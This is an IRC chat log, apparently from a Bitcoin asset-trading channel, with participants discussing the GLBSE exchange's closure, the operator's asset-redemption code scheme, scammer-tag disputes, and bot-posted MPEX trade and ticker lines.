were theymos Oct 08 15:10:01 ofcourse you would. Oct 08 15:10:02 but he did want a lol price for it Oct 08 15:10:11 point was you'd be acting on undisclosed insider info. Oct 08 15:10:21 he should have FIRST delineated all the problems he was seeing Oct 08 15:10:25 otherwise it's just fraud. Oct 08 15:10:35 well he said he was selling becasue he did not want his name listed on the legal papers Oct 08 15:10:52 i kinda trust him, i doubt he expected nefario to go bat shit crazy Oct 08 15:10:56 he should have saiod "im selling because nefario will likely crash this thing and i'd rather get something than nothing" Oct 08 15:11:05 anything other than that level of disclosure -> fraud. Oct 08 15:11:12 im not so sure Oct 08 15:11:26 ya well, this'd be why you're not so well trusted. Oct 08 15:13:17 im pretty well trusted, im more than happy with the level of trust the comunity has given me Oct 08 15:13:43 [MPEX] [S.DICE] 282 @ 0.0032 = 0.9024 BTC [-] Oct 08 15:13:45 [MPEX] [S.DICE] 18 @ 0.0001 = 0.0018 BTC [-] Oct 08 15:13:54 i have a lap top that works fine other than the scree will light up only about 2% of normal, just enough to know it is there... this is pretty much fucked right? Oct 08 15:14:42 you can prolly set luminiosity somewhere Oct 08 15:14:43 replace the backlight Oct 08 15:15:15 "I've decided Nefario will get a scammer tag for this. " Oct 08 15:15:24 who what? Oct 08 15:15:25 link mp? Oct 08 15:15:43 kakobrekla is that pretty easy to do at a computer shop? Oct 08 15:16:05 well dunno, its not a rocket science Oct 08 15:16:20 badbear Oct 08 15:16:24 https://bitcointalk.org/index.php?topic=115669.540 Oct 08 15:18:56 umm Oct 08 15:19:02 why is theymos saying thankyou Oct 08 15:19:09 isnt he in the same mess Oct 08 15:19:16 lol Oct 08 15:19:24 cause theymos owns the forum and has asked the guy to do it ? Oct 08 15:20:20 thanks for the link Oct 08 15:22:02 and we're under 11. Oct 08 15:22:11 back under 11 Oct 08 15:22:14 [MPEX] [S.DICE] 100000 @ 0.00295 = 295 BTC [+] Oct 08 15:22:20 meh. Oct 08 15:23:18 as long as it stays over 7.5 im happy Oct 08 15:23:21 btw go LTC :) Oct 08 15:23:24 Zombie apocalypsis Oct 08 15:23:53 Go, go Oct 08 15:24:19 ;;ticker Oct 08 15:24:20 Best bid: 10.96809, Best ask: 11.089, Bid-ask spread: 0.12091, Last trade: 11.089, 24 hour volume: 87181, 24 hour low: 10.621, 24 hour high: 12.21 Oct 08 15:26:26 ;;bc,stats Oct 08 15:26:28 Current Blocks: 202360 | Current Difficulty: 3054627.5269486 | Next Difficulty At Block: 203615 | Next Difficulty In: 1255 blocks | Next Difficulty In About: 1 week, 2 days, 0 hours, 29 minutes, and 15 seconds | Next Difficulty Estimate: 2953812.97685027 | Estimated Percent Change: -3.30038766458 Oct 08 15:26:32 oh wow Oct 08 15:26:50 There has been [for awhile] a fairly reasonable service from MtGox lately as far as withdrawals were going. Is it going back to trouble mode? I have week worth of withdrawals, all don't move. Oct 08 15:26:54 i dont get it Oct 08 15:27:00 wow was mtgox running on partial funds ? Oct 08 15:27:11 http://smpake.com/etc/btc/ Oct 08 15:27:21 why would be people unplugging them hashers Oct 08 15:27:37 its not that bad yet Oct 08 15:27:43 especially with 25 comming Oct 08 15:27:52 Famous death spiral? Oct 08 15:28:11 scared of diff Oct 08 15:28:13 lol Oct 08 15:28:14 dunno Oct 08 15:28:44 [MPEX] [S.DICE] 100000 @ 0.0028 = 280 BTC [-] Oct 08 15:28:44 [MPEX] [S.DICE] 100000 @ 0.0026 = 260 BTC [-] Oct 08 15:28:46 [MPEX] [S.DICE] 42700 @ 0.0024 = 102.48 BTC [-] Oct 08 15:28:56 for crying out loud. Oct 08 15:28:58 Wow Oct 08 15:29:11 mp errything alrite there? Oct 08 15:29:14 [MPEX] [S.DICE] 1900 @ 0.0024 = 4.56 BTC [-] Oct 08 15:29:23 afaik ?! Oct 08 15:30:05 [MPEX] [S.DICE] 38288 @ 0.0024 = 91.8912 BTC [-] Oct 08 15:30:31 !ticker s.dice Oct 08 15:30:33 [MPEX:S.DICE] 1day: 0.0001 / 0.0027205 / 0.00320001 (399098 shares, 1,085.75 BTC), 30day: 0.0001 / 0.003221 / 0.0034 (2081519 shares, 6,704.59 BTC) Oct 08 15:30:36 Seems like the crash has just begun Oct 08 15:30:41 hm. Oct 08 15:31:02 Hope not Oct 08 15:31:35 i could see 7.5 being retested Oct 08 15:31:59 nah Oct 08 15:31:59 we see. Oct 08 15:32:34 yest was massive dump on mpoe day Oct 08 15:32:40 day before massive dump on giga.etf day Oct 08 15:32:43 i guess it's a blessed week. Oct 08 15:33:01 long weekend in usa im sure is also hurting the btc price Oct 08 15:33:19 heck, let it go to two for all i care. Oct 08 15:33:25 i buy a little more :D Oct 08 15:34:14 You'll buy it all... Oct 08 15:34:16 xD Oct 08 15:34:28 lol Oct 08 15:34:31 Share a little, if you do Oct 08 15:34:34 i'll leave 1 btc for all the rest of you to split up Oct 08 15:34:55 Ok, I can use it Oct 08 15:36:04 lucky i paid for my ssds at 13 usd Oct 08 15:36:09 Security through obscurity is not security. Passwords are security through obscurity, so yes, it is. Oct 08 15:36:10 ahaha Oct 08 15:36:56 [MPEX] [O.BTCUSD.P090T] 10 @ 0.05651891 = 0.5652 BTC [+] Oct 08 15:42:32 soo gigavps is getting a lawyer too. Oct 08 15:42:36 curious how far this goes. Oct 08 15:42:57 jeez. Oct 08 15:43:53 Lots of overacting, imho Oct 08 15:44:22 Another reason to keep bond fees high :> Oct 08 15:53:53 [MPEX] [F.GIGA.ETF] [PAID] 1000000 @ 0.00003459 = 34.58804 BTC Oct 08 15:55:37 that's three weeks that were actually paid. if/when giga manages to sort out the glbbq mess there'll be more. Oct 08 15:56:41 Tasty Oct 08 15:59:23 I am meeting with my lawyers this week to investigate the legality of operating a bitcoin stock exchange, or something along those lines, in Canada. I deal with a global law firm that does a lot of work in the financial sector, so they should be able to provide me with a solid footing. Oct 08 15:59:23 After the legal issues are sorted out, my main concern is how to create one that is not centralized, and not run by a small group of people. I am already working with some top notch security and hosting people, Oct 08 15:59:30 how many times have we read this ? Oct 08 16:01:37 i vote that we just let rg have all our money Oct 08 16:02:39 [MPEX] [S.DICE] 17112 @ 0.0024 = 41.0688 BTC [-] Oct 08 16:02:41 [MPEX] [S.DICE] 300000 @ 0.0022 = 660 BTC [-] Oct 08 16:02:42 [MPEX] [S.DICE] 52888 @ 0.0018 = 95.1984 BTC [-] Oct 08 16:02:50 you have got to be motherfucking kidding me. Oct 08 16:03:17 That guy wanted out... Oct 08 16:03:40 guys wanted out all day wtf. Oct 08 16:03:45 Why I believe all that money is headed directly into an exchange? Oct 08 16:04:21 who posted that Oct 08 16:04:36 rdponticelli o rly, i dunno... Oct 08 16:04:48 >> 14:59.30 ( mircea_popescu ) I am meeting with my lawyer Oct 08 16:04:49 this Oct 08 16:04:52 url? Oct 08 16:05:01 kakobrekla https://bitcointalk.org/index.php?topic=115553.msg1251984#msg1251984 Oct 08 16:05:14 mircea_popescu, srsly, when you quote, urlpls automagic Oct 08 16:05:21 aite. Oct 08 16:05:24 didn't want to spam Oct 08 16:05:58 [MPEX] [O.BTCUSD.C090T] 1000 @ 0.31012557 = 310.1256 BTC [-] Oct 08 16:06:14 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.2400318 = 240.0318 BTC [-] Oct 08 16:06:30 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.18222296 = 182.223 BTC [-] Oct 08 16:09:10 So, it was out from S.DICE to short calls... Oct 08 16:09:34 those were bought i think Oct 08 16:09:36 not sold Oct 08 16:09:53 .py 310.1256 + 240.0318 + 182.223 Oct 08 16:09:54 732.3804 Oct 08 16:09:59 Oh Oct 08 16:10:00 it would cover... Oct 08 16:10:11 tho you'd have to be imo insane to sell s.dice half price to buy calls. Oct 08 16:10:13 but who knows. Oct 08 16:10:45 Maybe somebody knows something... Oct 08 16:12:36 .py 6 / 15.0 Oct 08 16:12:38 0.4 Oct 08 16:12:54 stands to profit 90 btc on those c090t if btc goes to 15 Oct 08 16:14:21 http://www.spiegel.de/international/germany/pirate-party-member-julia-schramm-slammed-for-defending-copyright-a-856977.html Oct 08 16:14:22 lulzy Oct 08 16:19:03 http://mathbabe.org/2012/10/06/dissolve-the-sec/ Oct 08 16:21:41 ou know that if I can actually consider paying the fine myself, then the fine is too small. Oct 08 16:21:45 retard alarm. Oct 08 16:23:03 http://www.capex.com/ this is kinda lulzy. Oct 08 16:23:15 from here https://bitcointalk.org/index.php?topic=117156.0 Oct 08 16:23:52 its a game Oct 08 16:24:20 haha is that a meme ? Oct 08 16:32:52 [MPEX] [S.MPOE] 14400 @ 0.00031245 = 4.4993 BTC [-] Oct 08 16:32:53 [MPEX] [S.MPOE] 56800 @ 0.0003125 = 17.75 BTC [+] Oct 08 16:58:14 [MPEX] [S.MPOE] 707 @ 0.00031338 = 0.2216 BTC [+] Oct 08 16:58:16 [MPEX] [S.MPOE] 4975 @ 0.0003137 = 1.5607 BTC [+] Oct 08 16:58:17 [MPEX] [S.MPOE] 54318 @ 0.00031379 = 17.0444 BTC [+] Oct 08 17:04:21 [MPEX] [S.MPOE] 1 @ 0.00031271 BTC [-] Oct 08 17:15:06 Update:we will begin processing account closures and returning bitcoin later today. Oct 08 17:15:15 account closures? Oct 08 17:15:33 that was not expected Oct 08 17:16:08 Chaang-Noi: what is returning? Oct 08 17:16:09 nice, look, the whole situation sucks, he's closing down so your accounts will be closed. let's just hope for the best that everyone gets their coins back and an accounting of who owns what Oct 08 17:16:56 yeah it would be nice if people got their coins back. Oct 08 17:17:11 but this asset thing is going to be a mess, a massive mess Oct 08 17:17:32 get their btc back from... Oct 08 17:17:35 context people, context :P Oct 08 17:17:37 GLBSE Oct 08 17:17:41 www.glbse.com Oct 08 17:17:54 ah cool Oct 08 17:18:04 its going to be a massive mess, we know that, as long as it keeps moving forward from here, its better than moving backward or not moving Oct 08 17:18:22 not really sure why thats cool, im sure most people have invested in now worthless assets, not have btc being held on glbse Oct 08 17:18:45 my asset is still worth as much as I paid for it \o/ Oct 08 17:19:20 well lets see if everybody gets back the coins they do have an accounting of what they have and then we can bitch about how it sucks Oct 08 17:19:23 i agree pigeons but i expect things will slow down. iv already been told i cant accept the code system glbse gave me Oct 08 17:19:39 when i say slow down i mean stop. Oct 08 17:19:45 what are your suggestions for an alternate to the code system? Oct 08 17:19:56 i have no suggestions. Oct 08 17:20:22 is your main concern with the code system that you don't trust that the information is accurate? Oct 08 17:20:41 i can only accept the code system if nefario will take the liability for it going bad and BS aml stuff. Oct 08 17:20:51 i see Oct 08 17:21:13 as far as i know he is giving these codes to terrorists and is using me to launder money. Oct 08 17:21:31 whatever Oct 08 17:21:58 i know, it sucks. i had hoped nefario would be able to come up with a better option Oct 08 17:21:58 pirate could be a terrorists laudring money ... you didnt have a problem back then? Oct 08 17:22:12 i got a lawyer since then. Oct 08 17:22:16 ... Oct 08 17:22:25 also i did aml pirate Oct 08 17:22:41 i know who pirate is, Oct 08 17:23:01 and how does that help you now Oct 08 17:23:06 AML = anti money-laundering Oct 08 17:23:29 AML = Acute myeloid leukemia Oct 08 17:23:31 if the feds arrest me and ask me where the money went i can say pirate and i can say why. Oct 08 17:24:13 if i take the code system and the feds arrest me i can say i dont know where it went and cuz i trusted some guy who was made at me named nefario... Oct 08 17:24:20 mad* Oct 08 17:24:41 the coins need to go to nefario first so he can verrify that the correct owners get them Oct 08 17:24:52 and i thought he was going to do something like that Oct 08 17:25:01 i was told he was, and i guess he still might. Oct 08 17:25:14 but that update did not sound too good. Oct 08 17:29:25 [MPEX] [S.MPOE] 3435 @ 0.00031271 = 1.0742 BTC [-] Oct 08 17:29:26 [MPEX] [S.MPOE] 16900 @ 0.00031234 = 5.2785 BTC [-] Oct 08 17:29:28 [MPEX] [S.MPOE] 33265 @ 0.0003115 = 10.362 BTC [-] Oct 08 17:53:05 how does nefario know where to send all our coins to? Oct 08 17:54:15 in short, nefario made huge present to all the sec issuers? Oct 08 17:55:05 [MPEX] [S.MPOE] 8382 @ 0.00031379 = 2.6302 BTC [+] Oct 08 17:55:06 [MPEX] [S.MPOE] 67718 @ 0.00031425 = 21.2804 BTC [+] Oct 08 17:56:27 no, the sec issuers are pretty screwed. they are now in a very bad spot. Oct 08 17:56:47 if nefario does what i think he will. he however might not so we will just have to wait. Oct 08 17:57:36 Chaang-Noi: I've heard other people saying legal advice they received suggested that issuers (even in the US) would be shielded by the fact that nefario acted as more than an exchange, and he would thus be on the hook for the issuance of bad securities Oct 08 17:57:45 rather than the people we generally consider the issuers Oct 08 17:57:53 how come Chaang-Noi? They have the coin and "no way to pay" back Oct 08 17:58:43 yes copumpkin, that is what i was told to and one of the meany reasons why i should not accept a code system. Oct 08 17:58:51 a code system? Oct 08 17:59:08 femtotube just because they have btc does not mean they can spend them. they ahve to hold them forever until this gets solved. Oct 08 17:59:16 btw, I am in attempting to set up a OT server to see how it works and can it be used to pick up where GLBSE left off Oct 08 17:59:24 anyway, I'd much prefer if nobody got screwed over this, especially people I like Oct 08 17:59:30 Chaang-Noi: not in this scammers an liars community :) Oct 08 17:59:30 so can we arrange that, kthx? Oct 08 17:59:37 copumpkin you must not know about my assets being delisted and me being given a "code system" to find the asset holders? Oct 08 17:59:49 Chaang-Noi: nah, I'm way behind the times Oct 08 18:00:02 Chaang-Noi: I also had a code to get something from your securities Oct 08 18:00:06 sounds baroque though Oct 08 18:00:10 guess what, site is gone :( Oct 08 18:00:21 just like Bach Oct 08 18:00:47 well copumpkin my assets were delisted. i was then givien a bunch of random numbers, the share holderes were then mailed a matching code. and we are supposed to meet up somehow and trade assets for codes. Oct 08 18:00:55 lol Oct 08 18:01:00 sounds ridiculous Oct 08 18:01:06 extreamly Oct 08 18:01:12 pigeons: I have a suggestion for alternative Oct 08 18:01:14 still working on it Oct 08 18:01:15 :) Oct 08 18:01:16 no one execpts that system Oct 08 18:01:23 I feel like he would've done a lot better if he'd had professional advice Oct 08 18:01:26 I havent shown you yet. :P Oct 08 18:01:26 or paid attention to it or something Oct 08 18:01:31 but he did so much stupid stuff Oct 08 18:01:43 why did i get poked? Oct 08 18:01:50 I still would prefer him not to get in trouble though Oct 08 18:02:07 people can use the codes more than once Oct 08 18:02:22 i have no way to know what code has been used twice, what one is real, its soo crazy Oct 08 18:02:24 what codes? wait? Oct 08 18:02:36 i was e-mailed a bunch of random numbers Oct 08 18:02:51 people are to then send me their secret code and then problem solved... Oct 08 18:02:58 I guess you're expected to keep records Oct 08 18:03:02 of which codes have been used Oct 08 18:03:10 nefario made up a system that clearly wont work for more than one reason Oct 08 18:03:12 are they long/random enough to be unguessable? Oct 08 18:03:23 actually Oct 08 18:03:23 what if a code is used more than once? Oct 08 18:03:28 thats waht I had been planning Oct 08 18:03:30 for him to do Oct 08 18:03:44 how do i know that the code holder really had the asset? Oct 08 18:03:45 lets hope he was smarter than that Oct 08 18:03:45 Chaang-Noi: I guess you're just supposed to keep a spreadsheet or a file somewhere with a list of the ones you've paid? Oct 08 18:03:48 have you laoded the data Oct 08 18:03:51 to see if thereare dupes? Oct 08 18:03:54 whats the ranges? Oct 08 18:03:58 Chaang-Noi: you need to trust nefario! sounds like a smart thing to do :) Oct 08 18:04:11 yeah, i can not do this without trusting nefario Oct 08 18:04:12 i agree with copumpkin: with proper care, there would be no dupes Oct 08 18:04:17 sadly right now i can not trust nefario Oct 08 18:04:19 sure, you can avoid dupes Oct 08 18:04:25 you still need to trust nefario's honesty and competence Oct 08 18:04:28 Chaang-Noi: your just going to pay out right? Oct 08 18:04:32 these codes have already been sold Oct 08 18:04:34 I don't think he's malicious, but I'm not too sure about the second half Oct 08 18:04:34 sucks, i expected him to take longer Oct 08 18:04:46 what? Oct 08 18:04:47 Chaang-Noi: did he give you how much each code owned? Oct 08 18:04:47 what happens when someone sells a valid code but its already been used? Oct 08 18:04:48 codes are sold ? Oct 08 18:04:53 or the guy who sold it uses it later? Oct 08 18:04:56 Chaang-Noi: caveat emptor Oct 08 18:05:02 first come first serv Oct 08 18:05:04 those things shouldn't be sold Oct 08 18:05:05 tell ppl not to buy them Oct 08 18:05:06 people are selling their codes like they would an asset but otc Oct 08 18:05:15 thats their problem Oct 08 18:05:17 they shouldnt do it Oct 08 18:05:19 buyers need to confirm with you that the code is valid Oct 08 18:05:20 first come first serv? lol Oct 08 18:05:23 r buy it Oct 08 18:05:26 if they wanna trade them Oct 08 18:05:29 have the original contact you Oct 08 18:05:30 the code is to be sold, not told Oct 08 18:05:30 YOU GOT SERVED Oct 08 18:05:32 and the new buyer contact you Oct 08 18:05:33 (FIRST) Oct 08 18:05:36 and do it through you Oct 08 18:05:49 iv been told i cant accept the code system anyway. Oct 08 18:05:56 im not a stock exchange. Oct 08 18:05:59 what? Oct 08 18:06:08 now i am mroe confused Oct 08 18:06:18 i thoguth the code was to show proof of ownership ? Oct 08 18:06:25 i can not accept the liability nefario had when he sold the assets Oct 08 18:06:30 and did users get their codes for their holdings? Oct 08 18:06:37 but the code system cant be trusted Oct 08 18:06:54 i was told user have codes, some people have codes Oct 08 18:07:07 fight the power. f-f-f-f-fight the power Oct 08 18:07:10 YES Oct 08 18:07:12 YES YES YES YES YES Oct 08 18:07:15 YESSSSSSSSSSSSSSSSSSSSS Oct 08 18:07:20 wait wait, is this ONLY for your assets? or for any asset due to closing ? Oct 08 18:07:24 iv seen some of the codes sent to me via email from supposed glbse customers Oct 08 18:07:26 NEFARIO IS GOING TO GET SCAMMER TAG Oct 08 18:07:30 but as far as i know its all nefario :/ Oct 08 18:07:31 BADBEAR CONFIRMED IT Oct 08 18:07:33 FUCK YES Oct 08 18:07:38 d3 he got it already Oct 08 18:07:40 hey Diablo-D3 Oct 08 18:07:41 pm Oct 08 18:07:44 YESSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS Oct 08 18:08:17 ukto i dont know what nefario ha done for other assets, only mine Oct 08 18:09:07 Chaang-Noi: well, you know he tried to fuck me Oct 08 18:09:16 he fucked everyone Oct 08 18:09:19 what u talkin bout willis Oct 08 18:09:24 yeah he is fucking everyone Oct 08 18:09:40 nefario went bat shit crazy Oct 08 18:09:50 well Oct 08 18:09:54 thers is some stuff apaprently Oct 08 18:10:04 stuff? Oct 08 18:10:09 Ukto: he tried to fuck me before getting fucked by nefario was popular Oct 08 18:10:31 Diablo-D3: i honestly wonder if my accoutn being 'hacked' was getting fucked by him too now Oct 08 18:10:44 he was living off of glbse Oct 08 18:10:51 told me himself he had no other income Oct 08 18:10:56 yes he was living off of glbse Oct 08 18:11:06 yeah, Im wondering how many BTC I actually lost in DMC, or if he actually stole them Oct 08 18:11:10 he said only from profits though, but Oct 08 18:11:12 and there were many accounts hacked that did not seem like they should ahve been Oct 08 18:11:14 I mean, why else would he intentionally fail to audit me Oct 08 18:11:19 he didnt want people to know what he was doing Oct 08 18:11:26 and he realized he would get caught Oct 08 18:13:56 I just need another.. 2~4 hours Oct 08 18:14:15 and i will have a solution for when nefario releases everyones info Oct 08 18:14:29 he can make info public Oct 08 18:14:32 violates his tos Oct 08 18:14:45 cant* Oct 08 18:15:52 what tos? i dont see one on the site Oct 08 18:15:54 Chaang-Noi: you mean like that passport photo he published? :P Oct 08 18:16:00 yeah Oct 08 18:16:01 as far as I am concerned, he changed his tos to nothingness Oct 08 18:16:02 perhaps it's shutting down cause he got sued over that Oct 08 18:16:12 thats why i never gave him my passport photo... Oct 08 18:16:21 that was stupid Oct 08 18:16:22 btw Oct 08 18:16:32 and childish Oct 08 18:16:35 he hadtoo many issues Oct 08 18:16:50 nefario has proven himself to be fail over and over, he just thought he was hot shit and protected Oct 08 18:17:01 i responded ukto Oct 08 18:17:12 I bet Ukto has +R Oct 08 18:17:13 * Ukto :You must log in with services to message this user Oct 08 18:17:15 and Chaang-Noi is not identified Oct 08 18:17:17 fix your shit ukto Oct 08 18:17:20 :) Oct 08 18:17:21 my shits fixed Oct 08 18:17:22 login Oct 08 18:17:23 foo Oct 08 18:17:24 :P Oct 08 18:17:35 it's the fucking goatse guy's fault Oct 08 18:17:40 it is Oct 08 18:17:43 if he wasn't baring his asshole to everyone, we wouldn't have +R Oct 08 18:17:45 is he still doing it? Oct 08 18:17:55 beats me, but I just turned it on unconditionally in my client Oct 08 18:17:59 hehehe Oct 08 18:20:12 [MPEX] [S.MPOE] 282 @ 0.00031425 = 0.0886 BTC [+] Oct 08 18:20:13 [MPEX] [S.MPOE] 33918 @ 0.00031458 = 10.6699 BTC [+] Oct 08 18:20:38 !ticker s.dice Oct 08 18:20:40 [MPEX:S.DICE] 1day: 0.0001 / 0.00243113 / 0.0032 (753188 shares, 1,831.10 BTC), 30day: 0.0001 / 0.00305967 / 0.0034 (2451519 shares, 7,500.86 BTC) Oct 08 18:28:24 anyone happen to have a screenshot of the asset page details? specifically the bid/ask tables? (for any asset) Oct 08 18:28:30 I am kinda curious about something Oct 08 18:28:38 cant find it on google images Oct 08 18:30:24 http://shrani.si/f/46/cB/1r4yqzFX/glbse.png Oct 08 18:39:49 awsome Oct 08 18:39:52 you rock kakobrekla :) Oct 08 18:45:24 [MPEX] [S.MPOE] 6983 @ 0.00031458 = 2.1967 BTC [+] Oct 08 18:45:26 [MPEX] [O.BTCUSD.P140T] 3 @ 0.25780139 = 0.7734 BTC [+] Oct 08 18:46:51 btw Oct 08 18:46:55 theres also the DMC swap chart Oct 08 18:47:04 that has approximately the last bids and asks for a lot of assets Oct 08 18:49:04 Ukto: did you want a snapshot of the glbse assets page? Oct 08 18:49:39 http://i.imgur.com/EHJaG.png <-- that? Oct 08 18:49:51 or http://i.imgur.com/Q0aYW.png Oct 08 18:49:51 ? Oct 08 18:50:47 Ok, you found it? Oct 08 18:51:17 :) Oct 08 18:51:47 as it woudl be pointless to mention before finding out if any asset creators want to continue Oct 08 18:52:11 Because some guy made one for my asset in it's thead, but I'm looking at it now and it's only the orderbook and the forms Oct 08 18:53:52 Anyway, this is it, if it's worthwhile: Oct 08 18:53:52 https://bitcointalk.org/index.php?topic=99710.msg1145265#msg1145265 Oct 08 18:55:17 Well, I had also saved the page with the portfolio of my asset account... Oct 08 18:57:59 i dont even know my password Oct 08 18:58:09 ? Oct 08 18:58:34 im guessing there will be a login of some sorts Oct 08 18:58:45 based on Chaang-Noi Oct 08 18:58:47 i expect there wont be Oct 08 18:58:58 asset holders will get a list of codes+amounts Oct 08 18:59:05 think he will collect aml docs? Oct 08 18:59:07 and the holders will get a list of matching codes+amount Oct 08 18:59:14 no, too much work Oct 08 18:59:19 asset holder can be abbreviated to ass-hol Oct 08 19:00:36 Everything can, and even should be abbreviated to ass-something Oct 08 19:00:41 [MPEX] [O.BTCUSD.C080T] 2 @ 0.38882848 = 0.7777 BTC [-] Oct 08 19:00:49 lol copumkin Oct 08 19:00:51 assbot was just the pioneer Oct 08 19:00:52 i might use that :) Oct 08 19:04:02 glbs is closed? Oct 08 19:04:43 (rumour from #bitcoin-otc, want to check is it true or not) Oct 08 19:04:56 Cylta has been closed for a week or so Oct 08 19:05:02 lol Oct 08 19:05:36 Bad news: bitcoinica isn't in business anymore Oct 08 19:06:02 whay about mybitcoin ? Oct 08 19:06:09 still going? Oct 08 19:06:19 Cylta: http://www.glbse.com Oct 08 19:06:23 and you will have your answer Oct 08 19:06:31 mircea_popescu: so, you are the only, who have a stock exchange with bitcoins? Oct 08 19:06:33 dont trust the word of random irc ppl Oct 08 19:06:36 Don't tell me mybitcoin has fallen! Oct 08 19:06:39 Cylta look in !topic Oct 08 19:06:54 rdponticelli o wow ?! when did that happen Oct 08 19:07:03 0,0!! Oct 08 19:07:06 I don't know Oct 08 19:07:11 mircea_popescu: oh, right... Oct 08 19:07:12 Ask Chaang-Noi Oct 08 19:07:19 what? Oct 08 19:07:44 i cant change the topic here Oct 08 19:08:07 kakobreka does that i think Oct 08 19:11:54 off to watch boardwalk, peace Oct 08 19:26:25 [MPEX] [S.MPOE] 4743 @ 0.00031458 = 1.4921 BTC [+] Oct 08 19:46:04 Chaang-Noi did you eventually get your btc balance from glbse ? Oct 08 19:46:24 some Oct 08 19:46:37 i expect more Oct 08 19:46:52 i just asked for the "undisputed btc" Oct 08 19:47:02 um. what % is that ? what's the nature of the dispute ? Oct 08 19:47:32 i dont know the nature. i still do not know why my account was closed and my assets seized Oct 08 19:48:13 ok, so did you get 99% of your btc ? 1% ? 50% ? Oct 08 19:49:29 i do not have an exact number but i expect a signiificant amount more Oct 08 19:49:45 i did not know my exact blance Oct 08 19:49:53 i made the mistake of trusting nefario... Oct 08 19:50:29 i made the mistake of trusting Oct 08 19:51:25 [MPEX] [S.MPOE] 13203 @ 0.00031458 = 4.1534 BTC [+] Oct 08 19:53:57 I make the mistake Oct 08 19:54:01 made* Oct 08 19:55:34 i trusted glbse cuz people like theymos were in it Oct 08 19:56:01 after dealing with a year of nefario its so clear now he is a crazy baby Oct 08 20:11:25 im getting arab hating spam now. wtf is wrong with people. Oct 08 20:12:36 o.O Oct 08 20:13:16 0,o Oct 08 20:16:08 ? Oct 08 20:16:15 on that note... night Oct 08 20:17:05 [MPEX] [S.MPOE] 5253 @ 0.00031458 = 1.6525 BTC [+] Oct 08 20:17:07 [MPEX] [S.MPOE] 11910 @ 0.00031471 = 3.7482 BTC [+] Oct 08 20:17:10 [MPEX] [S.MPOE] 13337 @ 0.00031478 = 4.1982 BTC [+] Oct 08 20:27:31 https://bitcointalk.org/index.php?topic=117235.0 scammer tag called for theymos. Oct 08 20:30:37 i must confess i like the emotional responses people come up with Oct 08 20:31:58 y? cause he trid to sell his shares? Oct 08 20:32:00 *clicks* Oct 08 20:32:16 cause he tried to sell shares in something he either did know or should have known was worthless Oct 08 20:32:22 and made no attempt to disclose what he knew. Oct 08 20:32:32 and misrepresented what he was selling. Oct 08 20:33:08 mircea_popescu it only appears now in hindsight that he _may have_ misrepresented himself publicly Oct 08 20:33:23 use weaker language until you are sure Oct 08 20:34:00 then give me all of your bitcoins because I've got a deal for you Oct 08 20:34:01 How about giving the whole forum a scammer tag :) We might as well with all the accusations coming down Oct 08 20:34:05 no. he claimed he's selling his 23% Oct 08 20:34:09 then... it wasn't his 23% Oct 08 20:35:25 some might say that the pirate thing escalated Oct 08 20:35:32 after theymos didn't get an invite Oct 08 20:35:41 and goat's passthrough came about Oct 08 20:35:46 some may say many things, including those. i didn't say them. Oct 08 20:35:48 ...some might say that Oct 08 20:35:54 i stuck to the facts. Oct 08 20:36:30 It's more fun to make things up and write my own history Oct 08 20:40:49 hey, ejoy. Oct 08 20:42:05 150 replies ? Oct 08 20:42:11 what did MPEX have to do with that thread... Oct 08 20:42:18 [MPEX] [S.MPOE] 44400 @ 0.00031363 = 13.9252 BTC [-] Oct 08 20:42:18 4th post or so Oct 08 20:42:19 [MPEX] [S.MPOE] 2100 @ 0.00031274 = 0.6568 BTC [-] Oct 08 20:42:35 i dunno Oct 08 20:42:41 Just put a scammer tag in every single satoshi Oct 08 20:42:45 lol Oct 08 20:42:55 it'd be the new and improved scatoshi Oct 08 20:43:12 And everybody who anytime touched a single satoshi would be life marked Oct 08 20:43:27 aka scatoshi'd. Oct 08 20:43:30 Done Oct 08 20:43:38 And we can end with that scammer subforum Oct 08 20:51:08 Maybe bulanula can admin the forum Oct 08 20:51:14 At least he's a harmless scammer Oct 08 20:51:45 ahahah Oct 08 20:52:29 Well, not precisely harmless, but at least the less harmful of the scammers Oct 08 20:54:34 what did he do again ? Oct 08 20:54:40 is he the guy with the advertising mispayment ? Oct 08 20:55:17 Yeah, something like that Oct 08 20:55:39 Somebody payd him in excess, and he kept the difference Oct 08 20:56:43 a right. Oct 08 21:07:57 [MPEX] [S.MPOE] 37900 @ 0.00031274 = 11.8528 BTC [-] Oct 08 21:10:45 I'll ask for an scammer tag for assbot Oct 08 21:11:03 He misrepresented value, failing to account for splits Oct 08 21:13:09 rdponticelli mens rea. Oct 08 21:17:34 Scammer tag to satoshi, then Oct 08 21:17:42 He started it all Oct 08 21:20:10 hehe Oct 08 21:20:17 let's go in small steps. Oct 08 21:20:41 adam back's hashcash was the start of the scam Oct 08 21:21:14 Ok, let's take care of all the bulanulas, first xD Oct 08 21:21:49 hey bitcoin is non refundable! Oct 08 21:24:21 pigeons no it was paypal. Oct 08 21:24:57 Get ready for it kids, bitcoin is going down the path of specialized criminal enterprise so fast it outstrips belief. The next big disaster is already out there- BFL's and the massive pre-order, that will end up getting the royal shaft in about 30 days Oct 08 21:25:01 quoth the loup. Oct 08 21:33:06 [MPEX] [S.MPOE] 67900 @ 0.00031437 = 21.3457 BTC [+] Oct 08 21:44:02 ;;ticker Oct 08 21:44:03 Best bid: 11.4, Best ask: 11.45, Bid-ask spread: 0.05000, Last trade: 11.45, 24 hour volume: 99825, 24 hour low: 10.621, 24 hour high: 11.99 Oct 08 21:57:56 https://bitcointalk.org/index.php?topic=84062.0 ahh so funnay. Oct 08 21:58:54 [MPEX] [S.MPOE] 24628 @ 0.00031478 = 7.7524 BTC [+] Oct 08 22:02:22 mircea_popescu: it could be true. Maybe if somebody kills the guy, glbse would be back up Oct 08 22:02:33 lmao Oct 08 22:02:48 But let's not try... Oct 08 22:03:05 i don't think i want it back up *that* bad. Oct 08 22:03:33 Me neither Oct 08 22:09:16 d;uh, it was you jcpham Oct 08 22:09:25 i'm sorry Oct 08 22:09:55 lol i was hmmm who is this person Oct 08 22:10:06 like a ninja i sneak Oct 08 22:10:20 ninjario Oct 08 22:10:33 so is the forum drama-exhausted or what ? i'd have expected a lot moar butthurt on theymos thread. Oct 08 22:10:55 the forum has been played out for some time now Oct 08 22:11:00 good luck to you Oct 08 22:11:08 poor dears. Oct 08 22:22:59 loldrama Oct 08 22:23:28 Drama? This would be beyond drama. Oct 08 22:23:54 its so far beyond draa it's total shock! Oct 08 22:23:58 This is a complete and utter catastrophe. Oct 08 22:24:27 